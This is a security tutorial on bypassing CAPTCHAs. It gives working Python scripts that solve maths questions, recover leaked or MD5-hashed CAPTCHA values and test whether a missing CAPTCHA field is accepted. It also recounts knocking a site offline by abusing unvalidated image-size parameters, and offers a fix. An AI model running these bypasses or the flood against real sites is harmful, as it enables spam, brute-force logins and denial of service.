Bypassing & Exploiting CAPTCHA

We live in a world where we need to prove to machines that we are humans. Pathetic! But before we take revenge on these puny machines, let's learn how CAPTCHAs work.
How does CAPTCHA work? First of all, CAPTCHA stands for "Completely Automated Public Turing test to tell Computers and Humans Apart". Why would you give such a long name to a program? Like, just call it Jeff or something. Anyway, a classic CAPTCHA looks like this:

[image: captcha example]

The user is presented with some randomly generated words or characters which have to be typed back into the web app. If the value entered by the user matches the value the web app generated, the user is allowed to do whatever they were trying to do. CAPTCHAs are mostly placed on forms to stop spammers, bots and brute-force attempts.
Most of the CAPTCHAs you are going to encounter in the wild will be of the following kinds:
  • The ones which ask you a simple maths question
  • The ones that ask you to copy-paste some text
  • The ones which ask you to enter some randomly generated characters
  • The ones which ask you to select images or something like that

How to bypass CAPTCHA?

First of all, why would someone use maths questions and the copy-paste thing? Yes, they are easy to bypass. Most of the time you will find this type of CAPTCHA on small or medium scale websites. But believe me, it stops most spammers, because their bots are generic and ain't nobody got time for tweaking their bot for every website. But if the site is a real target for a spammer, he will do it, and that's why if you are testing a website and find this kind of CAPTCHA, report it.
Here's an example of a script that can solve a maths question:

import requests  # library for making HTTP requests
import re        # regex library

def bypass(url):
    response = requests.get(url).text  # make a request to the page and retrieve the response body
    # extract the two numbers and the operator with a regex;
    # group(0) is the whole match, groups 1-3 are the captured parts
    match = re.search(r'(\d+)\s*([+\-])\s*(\d+)', response)
    if match is None:
        return None  # no question found on the page
    first_number = int(match.group(1))   # the captures are strings, so convert them
    operator = match.group(2)
    second_number = int(match.group(3))
    if operator == '+':                  # if the operator is +
        return first_number + second_number  # add the numbers
    if operator == '-':                  # if the operator is -
        return first_number - second_number  # subtract the numbers

print(bypass('https://target.com/registration.php'))
Here comes the part you are here for: the CAPTCHAs which ask you to enter characters.
Well, the first thing you should do is check the source to see how the CAPTCHA image is generated. If you see something like the following, it's an instant win!
https://example.com/apis/captcha.php?gen=31sa9
The CAPTCHA's value is included in the URL as a parameter value; just grab it and submit it.
But what if you encounter this?

https://example.com/apis/captcha.php?gen=c3Vja215ZGljaw==

No worries! Sometimes the value will be encoded, like this one, which is base64. Just decode it and submit it.

Here’s another one
https://example.com/apis/captcha.php?gen=1d2a33a595d1c7a313a080f527476e55

Here the value is an MD5 hash, and you can't just "decode" it because hashing is one-way (it is not encryption). Your best bet is to write a script that extracts the hash and then tries a hash lookup with some online service. Check out my Hash-Buster :wink: If the hash gets resolved, submit it; otherwise just reload the page and try again.
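As an added example (not the author's Hash-Buster and not code from the original post), here is a Python script that handles the three cases above in one go: it pulls the gen parameter out of the image URL, recognises an MD5 hex digest, tries a strict base64 decode, and otherwise treats the value as plain text. Instead of an online lookup service it brute-forces the hash over the CAPTCHA's own alphabet, which is an assumed lowercase-plus-digits set here; that works because the value space of a short CAPTCHA is tiny, so you never actually depend on the lookup service having seen the hash before. The demo values (a constructed base64 string and a hashed "k7x") are made up for the example.

```python
import base64
import binascii
import hashlib
import itertools
import re
import string
from urllib.parse import parse_qs, urlparse

# Assumed alphabet of the target's CAPTCHA (read it off a handful of refreshed
# images on the real target); 36 symbols is typical for the 5-char ones.
CAPTCHA_CHARSET = string.ascii_lowercase + string.digits


def extract_param(url, name='gen'):
    """Return the named query parameter of the CAPTCHA image URL, or None."""
    values = parse_qs(urlparse(url).query).get(name)
    return values[0] if values else None


def looks_like_md5(value):
    """32 hex characters is the shape of an MD5 hex digest."""
    return re.fullmatch(r'[0-9a-fA-F]{32}', value) is not None


def try_base64(value):
    """Decode value as base64 if it decodes cleanly to printable text, else None.

    Heuristic: a short plain value such as '31sa9' has a length that is not a
    multiple of 4, or does not decode to printable bytes, so it falls through.
    """
    if len(value) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw.isascii() and raw.decode('ascii').isprintable():
        return raw.decode('ascii')
    return None


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(digest, charset=CAPTCHA_CHARSET, max_length=5):
    """Brute-force the preimage of an MD5 digest over the CAPTCHA alphabet.

    This is the offline equivalent of the online hash lookup: the lookup
    service has simply precomputed these hashes. 36**5 (about 60 million)
    candidates takes a minute or two in CPython, so a 5-char CAPTCHA is
    recoverable even when the online service has no hit.
    """
    digest = digest.lower()
    for length in range(1, max_length + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = ''.join(combo)
            if md5_hex(candidate) == digest:
                return candidate
    return None


def solve_from_url(url, max_length=5):
    """Recover the CAPTCHA text from its image URL.

    Returns (text, how). The hash check runs first because a 32-char hex
    digest is also a syntactically valid base64 string.
    """
    value = extract_param(url)
    if value is None:
        return None, 'no gen parameter'
    if looks_like_md5(value):
        cracked = crack_md5(value, max_length=max_length)
        if cracked is None:
            return None, 'md5 not recovered; reload the page and try again'
        return cracked, 'md5'
    decoded = try_base64(value)
    if decoded is not None:
        return decoded, 'base64'
    return value, 'plain'


if __name__ == '__main__':
    # Constructed demo URLs; the page's own URLs would be handled the same way.
    for u in ('https://example.com/apis/captcha.php?gen=31sa9',
              'https://example.com/apis/captcha.php?gen=azd4MnE=',
              'https://example.com/apis/captcha.php?gen=' + md5_hex('k7x')):
        print(u, '->', solve_from_url(u, max_length=3))
```

Feed solve_from_url() the src of the CAPTCHA image as it appears in the page source; the base64 heuristic can misfire on a plain value that happens to decode to printable text, so if a submission fails, retry with the raw value.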

Okay, here’s another one
https://example.com/apis/captcha.php?gen=lkacksa&x=8

I won't solve this one for you; let me know in the comments how to do it.
Apart from the CAPTCHA image URL, check if there's some JavaScript interacting with the CAPTCHA, try to understand how it works and try to bypass it.
Yeah, one more thing: you can refresh the CAPTCHA again and again to see if it's truly random. If the CAPTCHA is being submitted through an HTTP request, you can try removing the CAPTCHA parameter to see how the server responds.
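Both of those checks can be scripted. The following is an added example, not code from the original post: it counts repeats across a batch of CAPTCHA refreshes, and it submits the same form with the correct value, a wrong value, an empty value, and with the field removed, then reports which variants the server treats exactly like the correct one. The offline demo uses a constructed backend that only validates the CAPTCHA when the field is present (an assumed bug, the isset-then-compare pattern); the urllib submitter is for running it against a real target, and the form field names are placeholders.

```python
import collections
import itertools
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def randomness_report(values):
    """Summarise how many distinct CAPTCHA values a batch of refreshes produced.

    For a 5-char alphanumeric CAPTCHA (36**5 values) even one repeat in 50
    refreshes is wildly unlikely, so any repeat points to a small fixed pool
    or a predictable generator that is worth enumerating.
    """
    counts = collections.Counter(values)
    repeats = {v: c for v, c in counts.items() if c > 1}
    return {'samples': len(values), 'distinct': len(counts),
            'repeats': repeats, 'suspicious': bool(repeats)}


def sample_captcha(fetch_value, n=50):
    """Refresh the CAPTCHA n times; fetch_value() returns the served value."""
    return randomness_report([fetch_value() for _ in range(n)])


def probe_captcha_handling(submit, form_data, captcha_field, correct_value):
    """Send the same form four ways and see which ones the server accepts.

    submit(data) -> a comparable response summary, e.g. (status, body length).
    Any variant that gets the same answer as the correct submission means the
    CAPTCHA is not actually enforced for that variant.
    """
    variants = {
        'correct': dict(form_data, **{captcha_field: correct_value}),
        'wrong': dict(form_data, **{captcha_field: 'zzzzz'}),
        'empty': dict(form_data, **{captcha_field: ''}),
        'missing': {k: v for k, v in form_data.items() if k != captcha_field},
    }
    results = {name: submit(data) for name, data in variants.items()}
    bypasses = [name for name in ('wrong', 'empty', 'missing')
                if results[name] == results['correct']]
    return results, bypasses


def urllib_submitter(url):
    """Build a submit() that POSTs the form and returns (status, body length).

    Status plus body length is a cheap diff; urlopen follows redirects, so a
    success that redirects still ends up as the final page. Compare full
    bodies when two responses only differ in an error message of similar size.
    """
    def submit(data):
        req = Request(url, data=urlencode(data).encode(), method='POST')
        try:
            with urlopen(req, timeout=10) as resp:
                return resp.status, len(resp.read())
        except HTTPError as err:
            return err.code, len(err.read())
    return submit


def constructed_server(data):
    """Made-up backend for the offline demo: it validates the CAPTCHA only
    when the field is present, so dropping the parameter skips the check."""
    if 'captcha' in data and data['captcha'] != 'k7x2q':
        return 403, len(b'wrong captcha')
    return 200, len(b'welcome')


if __name__ == '__main__':
    print(probe_captcha_handling(constructed_server,
                                 {'user': 'bob', 'pass': 'hunter2'}, 'captcha', 'k7x2q'))
    # Constructed generator with a pool of 4 values: 50 refreshes show repeats.
    pool = ['a1b2c', 'd3e4f', 'g5h6i', 'j7k8l']
    counter = itertools.count()
    print(sample_captcha(lambda: pool[next(counter) % len(pool)]))
```

Against a live target, pair sample_captcha() with a fetch that requests the CAPTCHA image URL and runs it through whatever recovery worked for you, and pass urllib_submitter(form_url) as the submit callable; keep the session cookie consistent across the four submissions, since the server ties the expected CAPTCHA value to the session.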
That's all for bypassing. Now let's talk about a scenario where I exploited a CAPTCHA vulnerability to knock a website offline with a denial-of-service attack (from a single machine with many threads, so strictly a DoS rather than a DDoS).

How to exploit CAPTCHA?

About a month ago I found this while testing a website.
The characters present in the CAPTCHA image aren't exposed here, but take a look at the URL of the image:

https://example.com/page/captcha.php?width=115&height=40&chars=5

As you can see, there are 3 parameters:
width: width of the image to be generated
height: height of the image to be generated
chars: number of characters to be generated

Without wasting any more time I opened the URL in a new tab and changed the value of the width parameter. Guess what? It generated a wider image! Yay! The server was not validating the parameters at all.

To exploit this behaviour I wrote a script that requested the following URL from lots of threads:

https://example.com/page/captcha.php?width=2000&height=1200&chars=9999

and the website went down in less than a minute. For every request the server had to render a 2000×1200 image with 9999 random characters and rendered noise on top, which is a lot of CPU and memory per request, and it simply ran out of resources.
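As an added example, not the author's flooding script, the following Python does the two things a tester actually needs here: it times single requests at increasing sizes to show that render time grows with the attacker-controlled parameters (one request per size, stopping early once a request is already slow, so the target is not knocked over during the test), and it shows the parameter handling captcha.php should have had, with caps that are assumed sane values for this illustration. The renderer used in the offline demo is a constructed stand-in that returns width×height bytes.

```python
import time
from urllib.parse import parse_qsl, urlencode, urlparse
from urllib.request import urlopen

# Server-side limits the endpoint should have enforced (assumed values for
# this illustration; the real page accepted anything).
MAX_WIDTH, MAX_HEIGHT, MAX_CHARS = 300, 100, 8
DEFAULT_WIDTH, DEFAULT_HEIGHT, DEFAULT_CHARS = 115, 40, 5


def probe_render_cost(fetch, base_url, sizes):
    """Fetch the CAPTCHA once per size and time it.

    fetch(url) -> bytes. One request per size, starting small and stopping
    as soon as a single request is already slow, is enough to prove that the
    render cost scales with attacker-controlled parameters; no flood needed.
    """
    rows = []
    for width, height, chars in sizes:
        url = base_url + '?' + urlencode({'width': width, 'height': height, 'chars': chars})
        start = time.perf_counter()
        body = fetch(url)
        elapsed = time.perf_counter() - start
        rows.append({'width': width, 'height': height, 'chars': chars,
                     'seconds': round(elapsed, 3), 'bytes': len(body)})
        if elapsed > 2.0:  # already expensive for the server; do not go bigger
            break
    return rows


def cost_grows_with_size(rows):
    """True when the largest probe took longer than the smallest one."""
    return len(rows) >= 2 and rows[-1]['seconds'] > rows[0]['seconds']


def clamp_captcha_params(query):
    """What captcha.php should have done: coerce each parameter to an int,
    fall back to the default on garbage, and cap it before rendering."""
    def bounded(name, default, upper):
        try:
            value = int(query.get(name, default))
        except (TypeError, ValueError):
            value = default
        return max(1, min(value, upper))
    return {'width': bounded('width', DEFAULT_WIDTH, MAX_WIDTH),
            'height': bounded('height', DEFAULT_HEIGHT, MAX_HEIGHT),
            'chars': bounded('chars', DEFAULT_CHARS, MAX_CHARS)}


def urllib_fetcher(url):
    """fetch() for a live target."""
    with urlopen(url, timeout=30) as resp:
        return resp.read()


def constructed_renderer(url):
    """Stand-in for the vulnerable endpoint (constructed for the offline demo):
    returns width*height bytes, like an uncompressed image, for any size."""
    params = dict(parse_qsl(urlparse(url).query))
    return b'\0' * (int(params['width']) * int(params['height']))


if __name__ == '__main__':
    sizes = [(115, 40, 5), (400, 150, 8), (2000, 1200, 20)]
    rows = probe_render_cost(constructed_renderer, 'https://example.com/page/captcha.php', sizes)
    print(rows, cost_grows_with_size(rows))
    print(clamp_captcha_params({'width': '2000', 'height': '1200', 'chars': '9999'}))
```

With urllib_fetcher as the fetch callable, a run over a few sizes gives you the timing table for the report; the clamp function is the shape of the fix to recommend, since the bug is not the rendering itself but that the caller chooses how much work the server does.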

Credit of this method goes to Somdev Sangwan
